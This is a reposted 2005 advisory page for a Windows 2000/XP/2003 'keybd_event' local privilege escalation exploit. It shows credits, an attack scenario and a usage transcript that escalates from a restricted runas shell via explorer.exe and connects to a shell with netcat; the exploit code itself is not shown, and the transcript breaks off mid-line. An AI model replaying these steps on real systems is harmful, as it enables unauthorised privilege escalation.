• Microsoft Windows "keybd_event" Local Privilege Escalation Exploit


    Compiled by: 天天安全网   Author: Anonymous   Published: 2005-09-09

    Vulnerability reference: http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
    Severity: Medium
    Affected: Microsoft Windows 2000/XP/2003
    Fix: No solution available at this time

    ------------------------------------------------------------------------------

    /*
    * Microsoft Windows keybd_event validation vulnerability.
    * Local privilege elevation
    *
    * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
    * Iñaki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
    *
    * Platforms affected/tested:
    *
    * - Windows 2000
    * - Windows XP
    * - Windows 2003
    *
    *
    * Original Advisory: http://www.haxorcitos.com
    * http://www.reversing.org
    *
    * Exploit Date: 08 / 06 / 2005
    *
    * Original Advisory:
    * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
    * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
    * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
    *
    * Attack Scenario:
    *
    * a) An attacker who gains access to an unprivileged shell/application executed
    * with the application runas.
    * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
    *
    * Impact:
    *
    * Due to insufficient keyboard input validation, it is possible to send keystrokes to any
    * application on the desktop.
    * By sending certain shortcut keys it is possible to execute code and elevate privileges,
    * obtaining the logged-on user's privileges and bypassing runas/service security restrictions.
    *
    * Exploit usage:
    *
    * C:/>whoami
    * AQUARIUS/Administrador
    *
    * C:/>runas /user:restricted cmd.exe
    * Enter the password for restricted:
    * Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
    *
    *
    * Microsoft Windows 2000 [Version.00.2195]
    * (C) Copyright 1985-2000 Microsoft Corp.
    *
    * C:/WINNT/system32>cd /
    *
    * C:/>whoami
    * AQUARIUS/restricted
    *
    * C:/>tlist.exe |find "explorer.exe"
    * 1140 explorer.exe Program Manager
    *
    * C:/>c:/keybd.exe 1140
    * HANDLE Found. Attacking =)
    *
    * C:/>nc localhost 65535
    * Microsoft Windows 2000 [Versi

  • Original URL: https://www.cnblogs.com/AloneSword/p/2237664.html